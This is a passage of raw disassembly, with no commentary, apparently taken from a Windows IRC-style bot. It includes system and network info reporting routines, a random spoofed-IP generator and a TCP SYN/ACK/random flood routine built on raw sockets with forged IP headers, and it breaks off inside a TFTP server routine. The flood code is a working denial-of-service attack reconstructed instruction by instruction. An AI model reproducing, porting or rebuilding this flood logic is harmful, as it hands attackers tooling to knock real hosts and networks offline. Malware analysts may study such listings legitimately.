lea eax, [ebp+70h+var_B8]
push eax
push [ebp+70h+var_4]
lea eax, [ebp+70h+var_2E8]
push offset aSS_4 ; "%s (%s)"
push eax
call sub_412BB5
lea eax, [ebp+70h+var_2E8]
add esp, 10h
mov [ebp+70h+var_4], eax
loc_40FEF6: ; CODE XREF: sub_40FE1F+44�j
; sub_40FE1F+AC�j ...
push 3Fh
pop ecx
xor eax, eax
mov [ebp+70h+var_25C], cx
lea edi, [ebp+70h+var_25A]
rep stosd
stosw
mov eax, dword_433530
cmp eax, ebx
mov [ebp+70h+var_C], 100h
jz short loc_40FF29
lea ecx, [ebp+70h+var_C]
push ecx
lea ecx, [ebp+70h+var_25C]
push ecx
call eax
loc_40FF29: ; CODE XREF: sub_40FE1F+FB�j
push [ebp+70h+arg_4]
call sub_406C33
pop ecx
push eax
call dword_433514
push 2
mov [ebp+70h+var_8], eax
push 4
lea eax, [ebp+70h+var_8]
push eax
call dword_433590
cmp eax, ebx
jz short loc_40FF52
push dword ptr [eax]
jmp short loc_40FF57
; ---------------------------------------------------------------------------
loc_40FF52: ; CODE XREF: sub_40FE1F+12D�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_40FF57: ; CODE XREF: sub_40FE1F+131�j
lea eax, [ebp+70h+var_3E4]
push eax
call sub_412BB5
pop ecx
pop ecx
push 104h
lea eax, [ebp+70h+var_4E8]
push eax
call ds:dword_41F040
push 46h
lea eax, [ebp+70h+var_114]
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
push ebx
mov esi, 409h
push esi
call ds:dword_41F068
push 46h
lea eax, [ebp+70h+var_15C]
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_41F064
push 8
pop ecx
xor eax, eax
lea edi, [ebp+70h+var_38]
rep stosd
lea eax, [ebp+70h+var_38]
push eax
call ds:dword_41F108
push ebx
push ebx
push ebx
lea eax, [ebp+70h+var_18]
push eax
lea eax, [ebp+70h+var_4E8]
push eax
call sub_4141AD
lea eax, [ebp+70h+var_18]
push eax
lea eax, [ebp+70h+var_7E8]
push eax
call sub_40253D
push 60h
pop ecx
mov esi, eax
lea edi, [ebp+70h+var_668]
push ebx
rep movsd
call sub_40FD16
add esp, 20h
push eax
lea eax, [ebp+70h+var_15C]
push eax
lea eax, [ebp+70h+var_114]
push eax
lea eax, [ebp+70h+var_25C]
push eax
push [ebp+70h+arg_4]
call sub_406C33
pop ecx
push eax
lea eax, [ebp+70h+var_3E4]
push eax
lea eax, [ebp+70h+var_4E8]
push eax
push [ebp+70h+var_C0]
lea eax, [ebp+70h+var_5E8]
push [ebp+70h+var_C4]
push [ebp+70h+var_C8]
push [ebp+70h+var_4]
push eax
lea eax, [ebp+70h+var_568]
push eax
mov eax, [ebp+70h+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_402439
pop ecx
pop ecx
push eax
mov eax, [ebp+70h+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_402439
pop ecx
pop ecx
push eax
call sub_40FD69
push edx
push eax
push offset aSysinfoCpuI64u ; "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
push 200h
push [ebp+70h+arg_0]
call sub_412E0D
mov eax, [ebp+70h+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
add ebp, 70h
leave
retn
sub_40FE1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_410086 proc near ; CODE XREF: sub_4078FA+33AE�p
; sub_4078FA+44DA�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 8Ch
push edi
push 20h
pop ecx
xor eax, eax
cmp dword_433618, eax
lea edi, [ebp+6Ch+var_8C]
rep stosd
pop edi
jnz short loc_4100EC
push eax
push 80h
lea eax, [ebp+6Ch+var_8C]
push eax
lea eax, [ebp+6Ch+var_C]
push eax
call dword_4335E8
test eax, eax
jnz short loc_4100CD
lea eax, [ebp+6Ch+var_8C]
push offset dword_4271BC
push eax
call sub_412BB5
pop ecx
pop ecx
loc_4100CD: ; CODE XREF: sub_410086+35�j
test [ebp+6Ch+var_C], 1
lea eax, [ebp+6Ch+var_8]
jz short loc_4100E5
push offset dword_4271B4
loc_4100DB: ; CODE XREF: sub_410086+64�j
push eax
call sub_412BB5
pop ecx
pop ecx
jmp short loc_41010A
; ---------------------------------------------------------------------------
loc_4100E5: ; CODE XREF: sub_410086+4E�j
push offset dword_4271B0
jmp short loc_4100DB
; ---------------------------------------------------------------------------
loc_4100EC: ; CODE XREF: sub_410086+1D�j
push esi
mov esi, offset off_4271AC
lea eax, [ebp+6Ch+var_8]
push esi
push eax
call sub_412BB5
lea eax, [ebp+6Ch+var_8C]
push esi
push eax
call sub_412BB5
add esp, 10h
pop esi
loc_41010A: ; CODE XREF: sub_410086+5D�j
push [ebp+6Ch+arg_4]
push [ebp+6Ch+arg_8]
call sub_406C33
pop ecx
push eax
lea eax, [ebp+6Ch+var_8C]
push eax
lea eax, [ebp+6Ch+var_8]
push eax
push offset aNetinfoTypeSS_ ; "[NETINFO]: [Type]: %s (%s). [IP Address"...
push 200h
push [ebp+6Ch+arg_0]
call sub_412E0D
mov eax, [ebp+6Ch+arg_0]
add esp, 1Ch
add ebp, 6Ch
leave
retn
sub_410086 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_41013C proc near ; CODE XREF: sub_401525+71�p
; sub_410408+1C�p
var_E4 = word ptr -0E4h
var_E2 = word ptr -0E2h
var_E0 = word ptr -0E0h
var_DE = word ptr -0DEh
var_DC = word ptr -0DCh
var_DA = word ptr -0DAh
var_D8 = word ptr -0D8h
var_D6 = word ptr -0D6h
var_D4 = word ptr -0D4h
var_D2 = word ptr -0D2h
var_D0 = word ptr -0D0h
var_CE = word ptr -0CEh
var_CC = word ptr -0CCh
var_CA = word ptr -0CAh
var_C8 = word ptr -0C8h
var_C6 = word ptr -0C6h
var_C4 = word ptr -0C4h
var_C2 = word ptr -0C2h
var_C0 = word ptr -0C0h
var_BE = word ptr -0BEh
var_BC = word ptr -0BCh
var_BA = word ptr -0BAh
var_B8 = word ptr -0B8h
var_B6 = word ptr -0B6h
var_B4 = word ptr -0B4h
var_B2 = word ptr -0B2h
var_B0 = word ptr -0B0h
var_AE = word ptr -0AEh
var_AC = word ptr -0ACh
var_AA = word ptr -0AAh
var_A8 = word ptr -0A8h
var_A6 = word ptr -0A6h
var_A4 = word ptr -0A4h
var_A2 = word ptr -0A2h
var_A0 = word ptr -0A0h
var_9E = word ptr -9Eh
var_9C = word ptr -9Ch
var_9A = word ptr -9Ah
var_98 = word ptr -98h
var_96 = word ptr -96h
var_94 = word ptr -94h
var_92 = word ptr -92h
var_90 = word ptr -90h
var_8E = word ptr -8Eh
var_8C = word ptr -8Ch
var_8A = word ptr -8Ah
var_88 = word ptr -88h
var_86 = word ptr -86h
var_84 = word ptr -84h
var_82 = word ptr -82h
var_80 = word ptr -80h
var_7E = word ptr -7Eh
var_7C = word ptr -7Ch
var_7A = word ptr -7Ah
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = word ptr -74h
var_72 = word ptr -72h
var_70 = word ptr -70h
var_6E = word ptr -6Eh
var_6C = word ptr -6Ch
var_6A = word ptr -6Ah
var_68 = word ptr -68h
var_66 = word ptr -66h
var_64 = word ptr -64h
var_62 = word ptr -62h
var_60 = word ptr -60h
var_5E = word ptr -5Eh
var_5C = word ptr -5Ch
var_5A = word ptr -5Ah
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = word ptr -54h
var_52 = word ptr -52h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = word ptr -48h
var_46 = word ptr -46h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0E4h
xor eax, eax
mov [ebp+74h+var_E4], ax
mov [ebp+74h+var_E2], 1
mov [ebp+74h+var_E0], 2
mov [ebp+74h+var_DE], 5
mov [ebp+74h+var_DC], 7
mov [ebp+74h+var_DA], 0Bh
mov [ebp+74h+var_D8], 17h
mov [ebp+74h+var_D6], 1Bh
mov [ebp+74h+var_D4], 1Fh
mov [ebp+74h+var_D2], 24h
mov [ebp+74h+var_D0], 25h
mov [ebp+74h+var_CE], 27h
mov [ebp+74h+var_CC], 29h
mov [ebp+74h+var_CA], 2Ah
mov [ebp+74h+var_C8], 31h
mov [ebp+74h+var_C6], 32h
mov [ebp+74h+var_C4], 49h
mov [ebp+74h+var_C2], 4Ah
mov [ebp+74h+var_C0], 4Bh
mov [ebp+74h+var_BE], 4Ch
mov [ebp+74h+var_BC], 4Dh
mov [ebp+74h+var_BA], 4Eh
mov [ebp+74h+var_B8], 4Fh
mov [ebp+74h+var_B6], 59h
mov [ebp+74h+var_B4], 5Ah
mov [ebp+74h+var_B2], 5Bh
mov [ebp+74h+var_B0], 5Ch
mov [ebp+74h+var_AE], 5Dh
mov [ebp+74h+var_AC], 5Eh
mov [ebp+74h+var_AA], 5Fh
mov [ebp+74h+var_A8], 60h
mov [ebp+74h+var_A6], 61h
mov [ebp+74h+var_A4], 62h
mov [ebp+74h+var_A2], 63h
mov [ebp+74h+var_A0], 64h
mov [ebp+74h+var_9E], 65h
mov [ebp+74h+var_9C], 66h
mov [ebp+74h+var_9A], 67h
mov [ebp+74h+var_98], 68h
mov [ebp+74h+var_96], 69h
mov [ebp+74h+var_94], 6Ah
mov [ebp+74h+var_92], 6Bh
mov [ebp+74h+var_90], 6Ch
mov [ebp+74h+var_8E], 6Dh
mov [ebp+74h+var_8C], 6Eh
mov [ebp+74h+var_8A], 6Fh
mov [ebp+74h+var_88], 70h
mov [ebp+74h+var_86], 71h
mov [ebp+74h+var_84], 72h
mov [ebp+74h+var_82], 73h
mov [ebp+74h+var_80], 74h
mov [ebp+74h+var_7E], 75h
mov [ebp+74h+var_7C], 76h
mov [ebp+74h+var_7A], 77h
mov [ebp+74h+var_78], 78h
mov [ebp+74h+var_76], 79h
mov [ebp+74h+var_74], 7Ah
mov [ebp+74h+var_72], 7Bh
mov [ebp+74h+var_70], 7Ch
mov [ebp+74h+var_6E], 7Dh
mov [ebp+74h+var_6C], 7Eh
mov [ebp+74h+var_6A], 7Fh
mov [ebp+74h+var_68], 0ADh
mov [ebp+74h+var_66], 0AEh
mov [ebp+74h+var_64], 0AFh
mov [ebp+74h+var_62], 0B0h
mov [ebp+74h+var_60], 0B1h
mov [ebp+74h+var_5E], 0B2h
mov [ebp+74h+var_5C], 0B3h
mov [ebp+74h+var_5A], 0B4h
mov [ebp+74h+var_58], 0B5h
mov [ebp+74h+var_56], 0B6h
mov [ebp+74h+var_54], 0B7h
mov [ebp+74h+var_52], 0B8h
mov [ebp+74h+var_50], 0B9h
mov [ebp+74h+var_4E], 0BAh
mov [ebp+74h+var_4C], 0BBh
mov [ebp+74h+var_4A], 0BDh
mov [ebp+74h+var_48], 0BEh
mov [ebp+74h+var_46], 0C5h
mov [ebp+74h+var_44], 0DFh
mov [ebp+74h+var_42], 0E0h
mov [ebp+74h+var_40], 0E1h
mov [ebp+74h+var_3E], 0E2h
mov [ebp+74h+var_3C], 0E3h
mov [ebp+74h+var_3A], 0E4h
mov [ebp+74h+var_38], 0E5h
mov [ebp+74h+var_36], 0E6h
mov [ebp+74h+var_34], 0E7h
mov [ebp+74h+var_32], 0E8h
mov [ebp+74h+var_30], 0E9h
mov [ebp+74h+var_2E], 0EAh
mov [ebp+74h+var_2C], 0EBh
mov [ebp+74h+var_2A], 0ECh
mov [ebp+74h+var_28], 0EDh
mov [ebp+74h+var_26], 0EEh
mov [ebp+74h+var_24], 0EFh
mov [ebp+74h+var_22], 0F0h
mov [ebp+74h+var_20], 0F1h
mov [ebp+74h+var_1E], 0F2h
mov [ebp+74h+var_1C], 0F3h
mov [ebp+74h+var_1A], 0F4h
mov [ebp+74h+var_18], 0F5h
mov [ebp+74h+var_16], 0F6h
mov [ebp+74h+var_14], 0F7h
mov [ebp+74h+var_12], 0F8h
mov [ebp+74h+var_10], 0F9h
mov [ebp+74h+var_E], 0FAh
mov [ebp+74h+var_C], 0FBh
mov [ebp+74h+var_A], 0FCh
mov [ebp+74h+var_8], 0FDh
mov [ebp+74h+var_6], 0FEh
mov [ebp+74h+var_4], 0FFh
loc_4103ED: ; CODE XREF: sub_41013C+2BF�j
movsx ecx, [ebp+eax*2+74h+var_E4]
cmp [ebp+74h+arg_0], ecx
jz short loc_410404
inc eax
cmp eax, 71h
jb short loc_4103ED
xor al, al
loc_4103FF: ; CODE XREF: sub_41013C+2CA�j
add ebp, 74h
leave
retn
; ---------------------------------------------------------------------------
loc_410404: ; CODE XREF: sub_41013C+2B9�j
mov al, 1
jmp short loc_4103FF
sub_41013C endp
; =============== S U B R O U T I N E =======================================
sub_410408 proc near ; CODE XREF: sub_41046C+1B9�p
push ebx
push esi
push edi
call sub_412D71
mov edi, 0FFh
jmp short loc_41041C
; ---------------------------------------------------------------------------
loc_410417: ; CODE XREF: sub_410408+24�j
call sub_412D71
loc_41041C: ; CODE XREF: sub_410408+D�j
cdq
mov ecx, edi
idiv ecx
mov esi, edx
push esi
call sub_41013C
test al, al
pop ecx
jnz short loc_410417
call sub_412D71
cdq
mov edi, 100h
mov ecx, edi
idiv ecx
mov ebx, edx
call sub_412D71
cdq
idiv edi
mov edi, edx
call sub_412D71
cdq
mov ecx, 0FEh
idiv ecx
mov eax, edx
inc eax
shl eax, 8
add eax, edi
shl eax, 8
add eax, ebx
shl eax, 8
pop edi
add eax, esi
pop esi
pop ebx
retn
sub_410408 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_41046C proc near ; DATA XREF: sub_4078FA+4F6D�o
var_13B0 = word ptr -13B0h
var_BE0 = byte ptr -0BE0h
var_BDF = byte ptr -0BDFh
var_BCC = byte ptr -0BCCh
var_BC0 = byte ptr -0BC0h
var_BB8 = byte ptr -0BB8h
var_410 = byte ptr -410h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_5F = byte ptr -5Fh
var_5E = word ptr -5Eh
var_5C = byte ptr -5Ch
var_48 = qword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 13B0h
call sub_412DD0
mov eax, [ebp+arg_0]
and [ebp+var_BE0], 0
push ebx
push esi
push edi
mov ebx, ds:dword_41F004
mov esi, eax
push 6Ah
pop ecx
lea edi, [ebp+var_210]
rep movsd
xor esi, esi
inc esi
mov [eax+1A4h], esi
xor eax, eax
mov ecx, 1F3h
lea edi, [ebp+var_BDF]
rep stosd
stosw
stosb
call ebx
push eax
call sub_412D64
pop ecx
push 0FFh
push 3
push 2
call dword_4334A0
cmp eax, 0FFFFFFFFh
mov [ebp+var_18], eax
jnz short loc_410535
call dword_433558
push eax
lea eax, [ebp+var_410]
push offset aTcpErrorSocket ; "[TCP]: Error: socket() failed, returned"...
push eax
call sub_412BB5
xor esi, esi
add esp, 0Ch
cmp [ebp+var_70], esi
jnz short loc_410516
loc_4104F6: ; CODE XREF: sub_41046C+5B1�j
push esi
push [ebp+var_74]
lea eax, [ebp+var_410]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_210]
call sub_4045DD
add esp, 14h
loc_410516: ; CODE XREF: sub_41046C+88�j
; sub_41046C+5AB�j
lea eax, [ebp+var_410]
push eax
call sub_401C33
push [ebp+var_8C]
call sub_4111AE
pop ecx
pop ecx
push esi
jmp loc_4109DB
; ---------------------------------------------------------------------------
loc_410535: ; CODE XREF: sub_41046C+66�j
push 4
lea ecx, [ebp+var_38]
push ecx
push 2
xor edi, edi
push edi
push eax
mov [ebp+var_38], esi
call dword_4334BC
cmp eax, 0FFFFFFFFh
jnz short loc_410578
call dword_433558
push eax
lea eax, [ebp+var_410]
push offset aTcpErrorSetsoc ; "[TCP]: Error: setsockopt() failed, retu"...
push eax
call sub_412BB5
add esp, 0Ch
loc_41056A: ; CODE XREF: sub_41046C+131�j
cmp [ebp+var_70], edi
jnz loc_4109C1
jmp loc_4109A1
; ---------------------------------------------------------------------------
loc_410578: ; CODE XREF: sub_41046C+E1�j
lea eax, [ebp+var_20C]
push eax
call dword_433514
cmp eax, 0FFFFFFFFh
jnz short loc_41059F
lea eax, [ebp+var_410]
push offset aTcpInvalidTarg ; "[TCP]: Invalid target IP."
push eax
call sub_412BB5
pop ecx
pop ecx
jmp short loc_41056A
; ---------------------------------------------------------------------------
loc_41059F: ; CODE XREF: sub_41046C+11C�j
xor eax, eax
lea edi, [ebp+var_48]
stosd
stosd
stosd
stosd
xor edi, edi
push edi
mov word ptr [ebp+var_48], 2
call dword_4335EC
mov word ptr [ebp+var_48+2], ax
lea eax, [ebp+var_20C]
push eax
call dword_433514
mov dword ptr [ebp+var_48+4], eax
mov [ebp+arg_0], edi
call ebx
mov [ebp+var_34], eax
mov [ebp+var_30], 45h
mov [ebp+var_2C], si
mov [ebp+var_2A], di
mov [ebp+var_27], 6
call ebx
sub eax, [ebp+var_34]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_7C]
ja loc_410956
and [ebp+var_60], 0
mov byte ptr [ebp+var_8], 50h
mov word ptr [ebp+var_8+6], di
mov [ebp+var_5F], 6
loc_41060A: ; CODE XREF: sub_41046C+4E4�j
call sub_412D71
cdq
mov ecx, 80h
idiv ecx
mov [ebp+var_26], di
add dl, cl
cmp [ebp+var_78], edi
mov [ebp+var_28], dl
jz short loc_41062C
call sub_410408
jmp short loc_41063F
; ---------------------------------------------------------------------------
loc_41062C: ; CODE XREF: sub_41046C+1B7�j
push [ebp+var_210]
call sub_406C33
pop ecx
push eax
call dword_433514
loc_41063F: ; CODE XREF: sub_41046C+1BE�j
cmp [ebp+var_80], edi
mov [ebp+var_24], eax
jz short loc_41066F
call sub_412D71
mov esi, eax
call sub_412D71
add eax, esi
cdq
idiv [ebp+var_80]
push dword ptr [ebp+var_48+4]
mov esi, edx
call dword_433570
add eax, esi
push eax
call dword_4335C4
jmp short loc_410672
; ---------------------------------------------------------------------------
loc_41066F: ; CODE XREF: sub_41046C+1D9�j
mov eax, dword ptr [ebp+var_48+4]
loc_410672: ; CODE XREF: sub_41046C+201�j
cmp [ebp+var_88], edi
mov [ebp+var_20], eax
jnz short loc_4106BE
call sub_412D71
mov esi, eax
inc esi
call sub_412D71
cdq
idiv esi
push ecx
push ecx
mov [ebp+var_1C], eax
fild [ebp+var_1C]
fstp [esp+8+var_8]
call sub_414670
pop ecx
pop ecx
call sub_414794
mov esi, eax
call sub_412D71
add eax, esi
cdq
mov ecx, 0FBFEh
idiv ecx
add edx, 401h
push edx
jmp short loc_4106C4
; ---------------------------------------------------------------------------
loc_4106BE: ; CODE XREF: sub_41046C+20F�j
push [ebp+var_88]
loc_4106C4: ; CODE XREF: sub_41046C+250�j
call dword_4335EC
cmp [ebp+var_84], edi
mov [ebp+var_12], ax
jnz short loc_410717
call sub_412D71
mov esi, eax
inc esi
call sub_412D71
cdq
idiv esi
push ecx
push ecx
mov [ebp+var_1C], eax
fild [ebp+var_1C]
fstp [esp+8+var_8]
call sub_414670
pop ecx
pop ecx
call sub_414794
mov esi, eax
call sub_412D71
add eax, esi
cdq
mov ecx, 0FBFEh
idiv ecx
add edx, 401h
push edx
jmp short loc_41071D
; ---------------------------------------------------------------------------
loc_410717: ; CODE XREF: sub_41046C+268�j
push [ebp+var_84]
loc_41071D: ; CODE XREF: sub_41046C+2A9�j
call dword_4335EC
mov [ebp+var_14], ax
call sub_412D71
cdq
mov esi, 100h
mov ecx, esi
idiv ecx
mov ebx, edx
shl ebx, 8
call sub_412D71
cdq
mov ecx, esi
idiv ecx
add ebx, edx
shl ebx, 8
call sub_412D71
cdq
mov ecx, esi
idiv ecx
add ebx, edx
shl ebx, 8
call sub_412D71
cdq
idiv esi
add ebx, edx
mov [ebp+var_10], ebx
call sub_412D71
shl eax, 1
cdq
mov ecx, 578h
idiv ecx
lea eax, [ebp+var_18C]
push offset aSyn_0 ; "syn"
push eax
mov ebx, edx
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_410797
mov [ebp+var_C], edi
mov byte ptr [ebp+var_8+1], 2
jmp short loc_410809
; ---------------------------------------------------------------------------
loc_410797: ; CODE XREF: sub_41046C+320�j
lea eax, [ebp+var_18C]
push offset aAck ; "ack"
push eax
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_4107C3
call sub_412D71
mov esi, eax
shl esi, 10h
call sub_412D71
mov byte ptr [ebp+var_8+1], 18h
jmp short loc_410804
; ---------------------------------------------------------------------------
loc_4107C3: ; CODE XREF: sub_41046C+340�j
lea eax, [ebp+var_18C]
push offset aRandom_0 ; "random"
push eax
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_410809
call sub_412D71
push 2
cdq
pop ecx
idiv ecx
test edx, edx
jnz short loc_4107F1
mov byte ptr [ebp+var_8+1], cl
mov [ebp+var_C], edi
jmp short loc_410809
; ---------------------------------------------------------------------------
loc_4107F1: ; CODE XREF: sub_41046C+37B�j
mov byte ptr [ebp+var_8+1], 18h
call sub_412D71
mov esi, eax
shl esi, 10h
call sub_412D71
loc_410804: ; CODE XREF: sub_41046C+355�j
or esi, eax
mov [ebp+var_C], esi
loc_410809: ; CODE XREF: sub_41046C+329�j
; sub_41046C+36C�j ...
lea eax, [ebx+28h]
push eax
call dword_4335EC
push 2000h
mov [ebp+var_2E], ax
call dword_4335EC
mov word ptr [ebp+var_8+2], ax
mov eax, [ebp+var_24]
mov [ebp+var_68], eax
mov eax, [ebp+var_20]
mov [ebp+var_64], eax
lea eax, [ebx+14h]
push eax
mov word ptr [ebp+var_8+4], di
call dword_4335EC
mov [ebp+var_5E], ax
mov eax, ebx
cdq
sub eax, edx
mov esi, eax
sar esi, 1
cmp esi, edi
jle short loc_410863
loc_410851: ; CODE XREF: sub_41046C+3F5�j
call sub_412D71
mov [ebp+edi*2+var_13B0], ax
inc edi
cmp edi, esi
jl short loc_410851
loc_410863: ; CODE XREF: sub_41046C+3E3�j
push 5
pop ecx
push 8
lea esi, [ebp+var_14]
lea edi, [ebp+var_5C]
rep movsd
pop ecx
lea esi, [ebp+var_68]
lea edi, [ebp+var_BE0]
rep movsd
mov ecx, ebx
mov eax, ecx
shr ecx, 2
lea esi, [ebp+var_13B0]
lea edi, [ebp+var_BC0]
rep movsd
mov ecx, eax
lea eax, [ebx+20h]
push eax
lea eax, [ebp+var_BE0]
and ecx, 3
push eax
rep movsb
call sub_406C89
push 5
pop ecx
push 5
mov word ptr [ebp+var_8+4], ax
lea esi, [ebp+var_30]
lea edi, [ebp+var_BE0]
rep movsd
pop ecx
lea esi, [ebp+var_14]
lea edi, [ebp+var_BCC]
rep movsd
mov ecx, ebx
mov eax, ecx
shr ecx, 2
lea esi, [ebp+var_13B0]
lea edi, [ebp+var_BB8]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
lea edi, [ebp+ebx+var_BB8]
stosd
add ebx, 28h
lea eax, [ebp+var_BE0]
push ebx
push eax
call sub_406C89
add esp, 10h
push 5
pop ecx
push 10h
mov [ebp+var_26], ax
lea esi, [ebp+var_30]
lea edi, [ebp+var_BE0]
lea eax, [ebp+var_48]
push eax
rep movsd
xor esi, esi
push esi
push ebx
lea eax, [ebp+var_BE0]
push eax
push [ebp+var_18]
call dword_433470
cmp eax, 0FFFFFFFFh
jz loc_4109E1
inc [ebp+arg_0]
call ds:dword_41F004
sub eax, [ebp+var_34]
xor edx, edx
mov ecx, 3E8h
div ecx
xor edi, edi
cmp eax, [ebp+var_7C]
jbe loc_41060A
loc_410956: ; CODE XREF: sub_41046C+188�j
push [ebp+var_18]
call dword_4335AC
mov eax, [ebp+arg_0]
imul eax, 7D0h
mov ecx, eax
shr eax, 0Ah
xor edx, edx
div [ebp+var_7C]
shr ecx, 14h
push ecx
push eax
push [ebp+arg_0]
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_410]
push offset aTcpDoneWithSFl ; "[TCP]: Done with %s flood to IP: %s. Se"...
push eax
call sub_412BB5
add esp, 1Ch
cmp [ebp+var_70], edi
jnz short loc_4109C1
loc_4109A1: ; CODE XREF: sub_41046C+107�j
push edi
push [ebp+var_74]
lea eax, [ebp+var_410]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_210]
call sub_4045DD
add esp, 14h
loc_4109C1: ; CODE XREF: sub_41046C+101�j
; sub_41046C+533�j
lea eax, [ebp+var_410]
push eax
call sub_401C33
push [ebp+var_8C]
call sub_4111AE
pop ecx
pop ecx
push edi
loc_4109DB: ; CODE XREF: sub_41046C+C4�j
call ds:dword_41F014
loc_4109E1: ; CODE XREF: sub_41046C+4C4�j
push [ebp+var_18]
call dword_4335AC
call dword_433558
push eax
push [ebp+arg_0]
lea eax, [ebp+var_20C]
push eax
push offset aTcpErrorSendin ; "[TCP]: Error sending packets to IP: %s."...
lea eax, [ebp+var_410]
push 200h
push eax
call sub_412E0D
add esp, 18h
cmp [ebp+var_70], esi
jnz loc_410516
jmp loc_4104F6
sub_41046C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_410A22 proc near ; CODE XREF: sub_410A22:loc_410EDB�p
; DATA XREF: sub_401141+107�o ...
var_884 = dword ptr -884h
var_880 = dword ptr -880h
var_780 = byte ptr -780h
var_580 = byte ptr -580h
var_57F = byte ptr -57Fh
var_57E = byte ptr -57Eh
var_57D = byte ptr -57Dh
var_57C = byte ptr -57Ch
var_37C = dword ptr -37Ch
var_378 = byte ptr -378h
var_274 = byte ptr -274h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = byte ptr -164h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_D6 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_58 = byte ptr -58h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 884h
mov edx, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, offset aOctet ; "octet"
lea edi, [ebp+74h+var_1C]
movsd
movsw
xor ebx, ebx
push ebx
xor eax, eax
inc eax
mov esi, edx
push 2
mov ecx, 0A9h
lea edi, [ebp+74h+var_37C]
rep movsd
inc [ebp+74h+var_16C]
push 2
mov [ebp+74h+var_10], eax
mov [edx+2A0h], eax
call dword_4334A0
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+74h+var_4], esi
jnz short loc_410ADE
push 190h
call ds:dword_41F000
call dword_433558
push eax
lea eax, [ebp+74h+var_780]
push offset aTftpErrorSocke ; "[TFTP]: Error: socket() failed, returne"...
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+74h+var_E0], ebx
jnz short loc_410AC1
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_4045DD
add esp, 14h
loc_410AC1: ; CODE XREF: sub_410A22+7D�j
lea eax, [ebp+74h+var_780]
push eax
call sub_401C33
push [ebp+74h+var_170]
call sub_4111AE
pop ecx
jmp loc_410EC7
; ---------------------------------------------------------------------------
loc_410ADE: ; CODE XREF: sub_410A22+52�j
mov eax, [ebp+74h+var_170]
